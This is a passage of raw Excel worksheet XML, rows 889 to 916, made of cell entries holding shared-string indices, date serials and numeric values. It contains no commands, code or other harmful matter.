      <c r="I889" t="s">
        <v>17</v>
      </c>
      <c r="J889" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K889" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L889" t="s">
        <v>83</v>
      </c>
      <c r="M889" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q889" s="95" t="s">
        <v>2784</v>
      </c>
      <c r="R889">
        <v>268</v>
      </c>
      <c r="S889">
        <v>513</v>
      </c>
      <c r="T889">
        <v>5470</v>
      </c>
      <c r="W889" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="890" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A890" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B890" s="52">
        <v>44602.796026678239</v>
      </c>
      <c r="C890" s="95" t="s">
        <v>2785</v>
      </c>
      <c r="D890" s="96">
        <v>230</v>
      </c>
      <c r="E890" s="95" t="s">
        <v>2803</v>
      </c>
      <c r="F890" s="42">
        <v>114</v>
      </c>
      <c r="G890" s="95" t="s">
        <v>2802</v>
      </c>
      <c r="H890" t="s">
        <v>2804</v>
      </c>
      <c r="I890" t="s">
        <v>17</v>
      </c>
      <c r="J890" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K890" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L890" t="s">
        <v>83</v>
      </c>
      <c r="M890" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q890" s="95" t="s">
        <v>2787</v>
      </c>
      <c r="R890">
        <v>783386</v>
      </c>
      <c r="S890">
        <v>694063</v>
      </c>
      <c r="T890">
        <v>680729</v>
      </c>
      <c r="U890">
        <v>948563</v>
      </c>
      <c r="V890">
        <v>893550</v>
      </c>
      <c r="W890" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="891" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A891" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B891" s="52">
        <v>44065.723533865741</v>
      </c>
      <c r="C891" s="95" t="s">
        <v>2780</v>
      </c>
      <c r="D891" s="96">
        <v>132</v>
      </c>
      <c r="E891" s="95" t="s">
        <v>2805</v>
      </c>
      <c r="F891" s="42">
        <v>110</v>
      </c>
      <c r="G891" s="95" t="s">
        <v>2806</v>
      </c>
      <c r="H891" t="s">
        <v>2807</v>
      </c>
      <c r="I891" t="s">
        <v>17</v>
      </c>
      <c r="J891" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K891" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L891" t="s">
        <v>83</v>
      </c>
      <c r="M891" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q891" s="95" t="s">
        <v>2784</v>
      </c>
      <c r="W891" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="892" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A892" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B892" s="52">
        <v>44602.796026701391</v>
      </c>
      <c r="C892" s="95" t="s">
        <v>2785</v>
      </c>
      <c r="D892" s="96">
        <v>230</v>
      </c>
      <c r="E892" s="95" t="s">
        <v>2808</v>
      </c>
      <c r="F892" s="42">
        <v>114</v>
      </c>
      <c r="G892" s="95" t="s">
        <v>2806</v>
      </c>
      <c r="H892" t="s">
        <v>2795</v>
      </c>
      <c r="I892" t="s">
        <v>17</v>
      </c>
      <c r="J892" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K892" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L892" t="s">
        <v>83</v>
      </c>
      <c r="M892" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q892" s="95" t="s">
        <v>2787</v>
      </c>
      <c r="R892">
        <v>239214</v>
      </c>
      <c r="S892">
        <v>214363</v>
      </c>
      <c r="T892">
        <v>207885</v>
      </c>
      <c r="U892">
        <v>251192</v>
      </c>
      <c r="V892">
        <v>235245</v>
      </c>
      <c r="W892" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="893" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A893" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B893" s="52">
        <v>44602.796026724536</v>
      </c>
      <c r="C893" s="95" t="s">
        <v>2785</v>
      </c>
      <c r="D893" s="96">
        <v>230</v>
      </c>
      <c r="E893" s="95" t="s">
        <v>2809</v>
      </c>
      <c r="F893" s="42">
        <v>103</v>
      </c>
      <c r="G893" s="95" t="s">
        <v>2810</v>
      </c>
      <c r="H893" t="s">
        <v>2811</v>
      </c>
      <c r="I893" t="s">
        <v>17</v>
      </c>
      <c r="J893" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K893" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L893" t="s">
        <v>83</v>
      </c>
      <c r="M893" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q893" s="95" t="s">
        <v>2787</v>
      </c>
      <c r="U893">
        <v>8</v>
      </c>
      <c r="V893">
        <v>954</v>
      </c>
      <c r="W893" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="894" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A894" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B894" s="52">
        <v>44065.723533935183</v>
      </c>
      <c r="C894" s="95" t="s">
        <v>2780</v>
      </c>
      <c r="D894" s="96">
        <v>132</v>
      </c>
      <c r="E894" s="95" t="s">
        <v>2812</v>
      </c>
      <c r="F894" s="42">
        <v>110</v>
      </c>
      <c r="G894" s="95" t="s">
        <v>2813</v>
      </c>
      <c r="H894" t="s">
        <v>2814</v>
      </c>
      <c r="I894" t="s">
        <v>17</v>
      </c>
      <c r="J894" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K894" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L894" t="s">
        <v>83</v>
      </c>
      <c r="M894" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q894" s="95" t="s">
        <v>2784</v>
      </c>
      <c r="W894" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="895" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A895" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B895" s="52">
        <v>44602.796026608798</v>
      </c>
      <c r="C895" s="95" t="s">
        <v>2785</v>
      </c>
      <c r="D895" s="96">
        <v>110</v>
      </c>
      <c r="E895" s="95" t="s">
        <v>2815</v>
      </c>
      <c r="F895" s="42">
        <v>200</v>
      </c>
      <c r="G895" s="95" t="s">
        <v>2813</v>
      </c>
      <c r="H895" t="s">
        <v>2816</v>
      </c>
      <c r="I895" t="s">
        <v>17</v>
      </c>
      <c r="J895" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K895" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L895" t="s">
        <v>83</v>
      </c>
      <c r="M895" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q895" s="95" t="s">
        <v>2787</v>
      </c>
      <c r="R895">
        <v>550386</v>
      </c>
      <c r="S895">
        <v>481375</v>
      </c>
      <c r="T895">
        <v>456168</v>
      </c>
      <c r="U895">
        <v>552002</v>
      </c>
      <c r="V895">
        <v>548885</v>
      </c>
      <c r="W895" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="896" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A896" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B896" s="52">
        <v>44312.610072314812</v>
      </c>
      <c r="C896" s="95" t="s">
        <v>2785</v>
      </c>
      <c r="D896" s="96">
        <v>230</v>
      </c>
      <c r="E896" s="95" t="s">
        <v>2815</v>
      </c>
      <c r="F896" s="42">
        <v>214</v>
      </c>
      <c r="G896" s="95" t="s">
        <v>2813</v>
      </c>
      <c r="H896" t="s">
        <v>1074</v>
      </c>
      <c r="I896" t="s">
        <v>17</v>
      </c>
      <c r="J896" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K896" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L896" t="s">
        <v>83</v>
      </c>
      <c r="M896" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q896" s="95" t="s">
        <v>161</v>
      </c>
      <c r="R896">
        <v>550386</v>
      </c>
      <c r="S896">
        <v>481375</v>
      </c>
      <c r="T896">
        <v>456168</v>
      </c>
      <c r="U896">
        <v>552002</v>
      </c>
      <c r="V896">
        <v>548885</v>
      </c>
      <c r="W896" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="897" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A897" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B897" s="52"/>
      <c r="D897" s="96"/>
      <c r="E897" s="95" t="s">
        <v>2817</v>
      </c>
      <c r="F897" s="42"/>
      <c r="H897" t="s">
        <v>2441</v>
      </c>
      <c r="I897" t="s">
        <v>268</v>
      </c>
      <c r="J897" s="95" t="s">
        <v>269</v>
      </c>
      <c r="P897" t="s">
        <v>250</v>
      </c>
      <c r="Q897" s="95" t="s">
        <v>2455</v>
      </c>
      <c r="W897" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="898" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A898" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B898" s="52">
        <v>44481.587994861111</v>
      </c>
      <c r="C898" s="95" t="s">
        <v>2818</v>
      </c>
      <c r="D898" s="96">
        <v>100</v>
      </c>
      <c r="E898" s="95" t="s">
        <v>2819</v>
      </c>
      <c r="F898" s="42">
        <v>100</v>
      </c>
      <c r="G898" s="95" t="s">
        <v>2820</v>
      </c>
      <c r="H898" t="s">
        <v>2821</v>
      </c>
      <c r="I898" t="s">
        <v>528</v>
      </c>
      <c r="J898" s="95" t="s">
        <v>2501</v>
      </c>
      <c r="K898" s="95" t="s">
        <v>39</v>
      </c>
      <c r="L898" t="s">
        <v>83</v>
      </c>
      <c r="M898" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q898" s="95" t="s">
        <v>2822</v>
      </c>
      <c r="S898">
        <v>385</v>
      </c>
      <c r="T898">
        <v>64217</v>
      </c>
      <c r="U898">
        <v>21887</v>
      </c>
      <c r="V898">
        <v>29389</v>
      </c>
      <c r="W898" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="899" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A899" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B899" s="52">
        <v>44610.697178946757</v>
      </c>
      <c r="C899" s="95" t="s">
        <v>2818</v>
      </c>
      <c r="D899" s="96">
        <v>110</v>
      </c>
      <c r="E899" s="95" t="s">
        <v>2819</v>
      </c>
      <c r="F899" s="42">
        <v>110</v>
      </c>
      <c r="G899" s="95" t="s">
        <v>2820</v>
      </c>
      <c r="H899" t="s">
        <v>2821</v>
      </c>
      <c r="I899" t="s">
        <v>528</v>
      </c>
      <c r="J899" s="95" t="s">
        <v>2501</v>
      </c>
      <c r="K899" s="95" t="s">
        <v>39</v>
      </c>
      <c r="L899" t="s">
        <v>83</v>
      </c>
      <c r="M899" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q899" s="95" t="s">
        <v>2822</v>
      </c>
      <c r="S899">
        <v>385</v>
      </c>
      <c r="T899">
        <v>64217</v>
      </c>
      <c r="U899">
        <v>21887</v>
      </c>
      <c r="V899">
        <v>29389</v>
      </c>
      <c r="W899" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="900" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A900" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B900" s="52">
        <v>44579.730290960651</v>
      </c>
      <c r="C900" s="95" t="s">
        <v>2823</v>
      </c>
      <c r="D900" s="96">
        <v>141</v>
      </c>
      <c r="E900" s="95" t="s">
        <v>2824</v>
      </c>
      <c r="F900" s="42">
        <v>113</v>
      </c>
      <c r="G900" s="95" t="s">
        <v>2825</v>
      </c>
      <c r="H900" t="s">
        <v>2826</v>
      </c>
      <c r="I900" t="s">
        <v>75</v>
      </c>
      <c r="J900" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K900" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L900" t="s">
        <v>77</v>
      </c>
      <c r="M900" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N900" t="s">
        <v>91</v>
      </c>
      <c r="O900" s="95" t="s">
        <v>2827</v>
      </c>
      <c r="Q900" s="95" t="s">
        <v>2828</v>
      </c>
      <c r="R900">
        <v>3210</v>
      </c>
      <c r="S900">
        <v>3236</v>
      </c>
      <c r="T900">
        <v>2718</v>
      </c>
      <c r="U900">
        <v>2532</v>
      </c>
      <c r="V900">
        <v>3876</v>
      </c>
      <c r="W900" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="901" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A901" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B901" s="52">
        <v>44579.73029097222</v>
      </c>
      <c r="C901" s="95" t="s">
        <v>2823</v>
      </c>
      <c r="D901" s="96">
        <v>141</v>
      </c>
      <c r="E901" s="95" t="s">
        <v>2829</v>
      </c>
      <c r="F901" s="42">
        <v>122</v>
      </c>
      <c r="G901" s="95" t="s">
        <v>2830</v>
      </c>
      <c r="H901" t="s">
        <v>2831</v>
      </c>
      <c r="I901" t="s">
        <v>75</v>
      </c>
      <c r="J901" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K901" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L901" t="s">
        <v>77</v>
      </c>
      <c r="M901" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N901" t="s">
        <v>91</v>
      </c>
      <c r="O901" s="95" t="s">
        <v>2832</v>
      </c>
      <c r="Q901" s="95" t="s">
        <v>2828</v>
      </c>
      <c r="R901">
        <v>2978</v>
      </c>
      <c r="S901">
        <v>2782</v>
      </c>
      <c r="T901">
        <v>2424</v>
      </c>
      <c r="U901">
        <v>2131</v>
      </c>
      <c r="V901">
        <v>3483</v>
      </c>
      <c r="W901" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="902" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A902" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B902" s="52">
        <v>44579.730290844906</v>
      </c>
      <c r="C902" s="95" t="s">
        <v>2823</v>
      </c>
      <c r="D902" s="96">
        <v>141</v>
      </c>
      <c r="E902" s="95" t="s">
        <v>2833</v>
      </c>
      <c r="F902" s="42">
        <v>102</v>
      </c>
      <c r="G902" s="95" t="s">
        <v>2834</v>
      </c>
      <c r="H902" t="s">
        <v>2835</v>
      </c>
      <c r="I902" t="s">
        <v>75</v>
      </c>
      <c r="J902" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K902" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L902" t="s">
        <v>77</v>
      </c>
      <c r="M902" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N902" t="s">
        <v>91</v>
      </c>
      <c r="O902" s="95" t="s">
        <v>2836</v>
      </c>
      <c r="Q902" s="95" t="s">
        <v>2828</v>
      </c>
      <c r="R902">
        <v>2979</v>
      </c>
      <c r="S902">
        <v>2785</v>
      </c>
      <c r="T902">
        <v>2309</v>
      </c>
      <c r="U902">
        <v>2117</v>
      </c>
      <c r="V902">
        <v>3438</v>
      </c>
      <c r="W902" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="903" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A903" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B903" s="52">
        <v>44579.730290995372</v>
      </c>
      <c r="C903" s="95" t="s">
        <v>2823</v>
      </c>
      <c r="D903" s="96">
        <v>141</v>
      </c>
      <c r="E903" s="95" t="s">
        <v>2837</v>
      </c>
      <c r="F903" s="42">
        <v>102</v>
      </c>
      <c r="G903" s="95" t="s">
        <v>2838</v>
      </c>
      <c r="H903" t="s">
        <v>2839</v>
      </c>
      <c r="I903" t="s">
        <v>75</v>
      </c>
      <c r="J903" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K903" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L903" t="s">
        <v>77</v>
      </c>
      <c r="M903" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N903" t="s">
        <v>91</v>
      </c>
      <c r="O903" s="95" t="s">
        <v>2840</v>
      </c>
      <c r="Q903" s="95" t="s">
        <v>2828</v>
      </c>
      <c r="R903">
        <v>5</v>
      </c>
      <c r="U903">
        <v>5</v>
      </c>
      <c r="V903">
        <v>2</v>
      </c>
      <c r="W903" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="904" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A904" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B904" s="52">
        <v>44435.604508159726</v>
      </c>
      <c r="C904" s="95" t="s">
        <v>2841</v>
      </c>
      <c r="D904" s="96">
        <v>100</v>
      </c>
      <c r="E904" s="95" t="s">
        <v>2842</v>
      </c>
      <c r="F904" s="42">
        <v>100</v>
      </c>
      <c r="G904" s="95" t="s">
        <v>2843</v>
      </c>
      <c r="H904" t="s">
        <v>2844</v>
      </c>
      <c r="I904" t="s">
        <v>528</v>
      </c>
      <c r="J904" s="95" t="s">
        <v>2501</v>
      </c>
      <c r="K904" s="95" t="s">
        <v>39</v>
      </c>
      <c r="L904" t="s">
        <v>83</v>
      </c>
      <c r="M904" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q904" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W904" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="905" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A905" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B905" s="52"/>
      <c r="C905" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D905" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E905" s="95" t="s">
        <v>2845</v>
      </c>
      <c r="F905" s="42">
        <v>100</v>
      </c>
      <c r="G905" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H905" t="s">
        <v>2846</v>
      </c>
      <c r="I905" t="s">
        <v>75</v>
      </c>
      <c r="J905" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K905" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L905" t="s">
        <v>77</v>
      </c>
      <c r="M905" s="95" t="s">
        <v>236</v>
      </c>
      <c r="P905" t="s">
        <v>2847</v>
      </c>
      <c r="Q905" s="95" t="s">
        <v>991</v>
      </c>
      <c r="W905" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="906" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A906" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B906" s="52">
        <v>43971.465269826389</v>
      </c>
      <c r="C906" s="95" t="s">
        <v>1733</v>
      </c>
      <c r="D906" s="96">
        <v>101</v>
      </c>
      <c r="E906" s="95" t="s">
        <v>2848</v>
      </c>
      <c r="F906" s="42">
        <v>101</v>
      </c>
      <c r="G906" s="95" t="s">
        <v>2849</v>
      </c>
      <c r="H906" t="s">
        <v>2850</v>
      </c>
      <c r="I906" t="s">
        <v>31</v>
      </c>
      <c r="J906" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K906" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L906" t="s">
        <v>77</v>
      </c>
      <c r="M906" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N906" t="s">
        <v>263</v>
      </c>
      <c r="Q906" s="95" t="s">
        <v>1737</v>
      </c>
      <c r="W906" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="907" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A907" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B907" s="52">
        <v>44292.098849571761</v>
      </c>
      <c r="C907" s="95" t="s">
        <v>1733</v>
      </c>
      <c r="D907" s="96">
        <v>105</v>
      </c>
      <c r="E907" s="95" t="s">
        <v>2848</v>
      </c>
      <c r="F907" s="42">
        <v>105</v>
      </c>
      <c r="G907" s="95" t="s">
        <v>2849</v>
      </c>
      <c r="H907" t="s">
        <v>2850</v>
      </c>
      <c r="I907" t="s">
        <v>31</v>
      </c>
      <c r="J907" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K907" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L907" t="s">
        <v>77</v>
      </c>
      <c r="M907" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N907" t="s">
        <v>263</v>
      </c>
      <c r="Q907" s="95" t="s">
        <v>1738</v>
      </c>
      <c r="R907">
        <v>40933</v>
      </c>
      <c r="S907">
        <v>42088</v>
      </c>
      <c r="T907">
        <v>35909</v>
      </c>
      <c r="U907">
        <v>36716</v>
      </c>
      <c r="V907">
        <v>47279</v>
      </c>
      <c r="W907" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="908" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A908" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B908" s="52"/>
      <c r="C908" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D908" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E908" s="95" t="s">
        <v>2851</v>
      </c>
      <c r="F908" s="42">
        <v>100</v>
      </c>
      <c r="G908" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H908" t="s">
        <v>2852</v>
      </c>
      <c r="I908" t="s">
        <v>75</v>
      </c>
      <c r="J908" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K908" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L908" t="s">
        <v>83</v>
      </c>
      <c r="M908" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N908" t="s">
        <v>221</v>
      </c>
      <c r="P908" t="s">
        <v>516</v>
      </c>
      <c r="Q908" s="95" t="s">
        <v>2853</v>
      </c>
      <c r="W908" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="909" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A909" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B909" s="52">
        <v>44523.723151099533</v>
      </c>
      <c r="C909" s="95" t="s">
        <v>2854</v>
      </c>
      <c r="D909" s="96">
        <v>100</v>
      </c>
      <c r="E909" s="95" t="s">
        <v>2855</v>
      </c>
      <c r="F909" s="42">
        <v>100</v>
      </c>
      <c r="G909" s="95" t="s">
        <v>2856</v>
      </c>
      <c r="H909" t="s">
        <v>2857</v>
      </c>
      <c r="I909" t="s">
        <v>185</v>
      </c>
      <c r="J909" s="95" t="s">
        <v>542</v>
      </c>
      <c r="K909" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L909" t="s">
        <v>83</v>
      </c>
      <c r="M909" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q909" s="95" t="s">
        <v>2858</v>
      </c>
      <c r="W909" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="910" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A910" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B910" s="52">
        <v>44523.723151087965</v>
      </c>
      <c r="C910" s="95" t="s">
        <v>2854</v>
      </c>
      <c r="D910" s="96">
        <v>100</v>
      </c>
      <c r="E910" s="95" t="s">
        <v>2859</v>
      </c>
      <c r="F910" s="42">
        <v>100</v>
      </c>
      <c r="G910" s="95" t="s">
        <v>2860</v>
      </c>
      <c r="H910" t="s">
        <v>2861</v>
      </c>
      <c r="I910" t="s">
        <v>185</v>
      </c>
      <c r="J910" s="95" t="s">
        <v>542</v>
      </c>
      <c r="K910" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L910" t="s">
        <v>83</v>
      </c>
      <c r="M910" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q910" s="95" t="s">
        <v>2858</v>
      </c>
      <c r="S910">
        <v>144</v>
      </c>
      <c r="T910">
        <v>5801</v>
      </c>
      <c r="U910">
        <v>61</v>
      </c>
      <c r="V910">
        <v>1456896</v>
      </c>
      <c r="W910" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="911" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A911" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B911" s="52">
        <v>44523.723151134262</v>
      </c>
      <c r="C911" s="95" t="s">
        <v>2854</v>
      </c>
      <c r="D911" s="96">
        <v>100</v>
      </c>
      <c r="E911" s="95" t="s">
        <v>2862</v>
      </c>
      <c r="F911" s="42">
        <v>100</v>
      </c>
      <c r="G911" s="95" t="s">
        <v>2863</v>
      </c>
      <c r="H911" t="s">
        <v>2864</v>
      </c>
      <c r="I911" t="s">
        <v>185</v>
      </c>
      <c r="J911" s="95" t="s">
        <v>542</v>
      </c>
      <c r="K911" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L911" t="s">
        <v>83</v>
      </c>
      <c r="M911" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q911" s="95" t="s">
        <v>2858</v>
      </c>
      <c r="W911" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="912" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A912" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B912" s="52">
        <v>44517.897685173608</v>
      </c>
      <c r="C912" s="95" t="s">
        <v>2865</v>
      </c>
      <c r="D912" s="96">
        <v>204</v>
      </c>
      <c r="E912" s="95" t="s">
        <v>2866</v>
      </c>
      <c r="F912" s="42">
        <v>102</v>
      </c>
      <c r="G912" s="95" t="s">
        <v>2867</v>
      </c>
      <c r="H912" t="s">
        <v>2868</v>
      </c>
      <c r="I912" t="s">
        <v>17</v>
      </c>
      <c r="J912" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K912" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L912" t="s">
        <v>83</v>
      </c>
      <c r="M912" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q912" s="95" t="s">
        <v>2869</v>
      </c>
      <c r="R912">
        <v>3154</v>
      </c>
      <c r="S912">
        <v>2677</v>
      </c>
      <c r="T912">
        <v>54</v>
      </c>
      <c r="U912">
        <v>50</v>
      </c>
      <c r="V912">
        <v>787</v>
      </c>
      <c r="W912" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="913" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A913" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B913" s="52">
        <v>44020.762400439817</v>
      </c>
      <c r="C913" s="95" t="s">
        <v>2865</v>
      </c>
      <c r="D913" s="96">
        <v>101</v>
      </c>
      <c r="E913" s="95" t="s">
        <v>2870</v>
      </c>
      <c r="F913" s="42">
        <v>101</v>
      </c>
      <c r="G913" s="95" t="s">
        <v>2871</v>
      </c>
      <c r="H913" t="s">
        <v>2872</v>
      </c>
      <c r="I913" t="s">
        <v>17</v>
      </c>
      <c r="J913" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K913" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L913" t="s">
        <v>83</v>
      </c>
      <c r="M913" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q913" s="95" t="s">
        <v>2873</v>
      </c>
      <c r="R913">
        <v>6585</v>
      </c>
      <c r="S913">
        <v>5885</v>
      </c>
      <c r="T913">
        <v>5914</v>
      </c>
      <c r="U913">
        <v>6081</v>
      </c>
      <c r="V913">
        <v>4798</v>
      </c>
      <c r="W913" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="914" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A914" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B914" s="52">
        <v>44495.791363599536</v>
      </c>
      <c r="C914" s="95" t="s">
        <v>2865</v>
      </c>
      <c r="D914" s="96">
        <v>204</v>
      </c>
      <c r="E914" s="95" t="s">
        <v>2870</v>
      </c>
      <c r="F914" s="42">
        <v>202</v>
      </c>
      <c r="G914" s="95" t="s">
        <v>2874</v>
      </c>
      <c r="H914" t="s">
        <v>2872</v>
      </c>
      <c r="I914" t="s">
        <v>17</v>
      </c>
      <c r="J914" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K914" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L914" t="s">
        <v>83</v>
      </c>
      <c r="M914" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q914" s="95" t="s">
        <v>2869</v>
      </c>
      <c r="R914">
        <v>165812</v>
      </c>
      <c r="S914">
        <v>873013</v>
      </c>
      <c r="T914">
        <v>1045252</v>
      </c>
      <c r="U914">
        <v>1095967</v>
      </c>
      <c r="V914">
        <v>1127387</v>
      </c>
      <c r="W914" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="915" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A915" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B915" s="52">
        <v>44092.756072256947</v>
      </c>
      <c r="C915" s="95" t="s">
        <v>2875</v>
      </c>
      <c r="D915" s="96">
        <v>201</v>
      </c>
      <c r="E915" s="95" t="s">
        <v>2876</v>
      </c>
      <c r="F915" s="42">
        <v>201</v>
      </c>
      <c r="G915" s="95" t="s">
        <v>2877</v>
      </c>
      <c r="H915" t="s">
        <v>2878</v>
      </c>
      <c r="I915" t="s">
        <v>172</v>
      </c>
      <c r="J915" s="95" t="s">
        <v>767</v>
      </c>
      <c r="K915" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L915" t="s">
        <v>83</v>
      </c>
      <c r="M915" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N915" t="s">
        <v>522</v>
      </c>
      <c r="O915" s="95" t="s">
        <v>2879</v>
      </c>
      <c r="Q915" s="95" t="s">
        <v>2880</v>
      </c>
      <c r="R915">
        <v>6910</v>
      </c>
      <c r="S915">
        <v>5909</v>
      </c>
      <c r="T915">
        <v>5276</v>
      </c>
      <c r="U915">
        <v>5279</v>
      </c>
      <c r="V915">
        <v>6540</v>
      </c>
      <c r="W915" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="916" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A916" s="95" t="s">
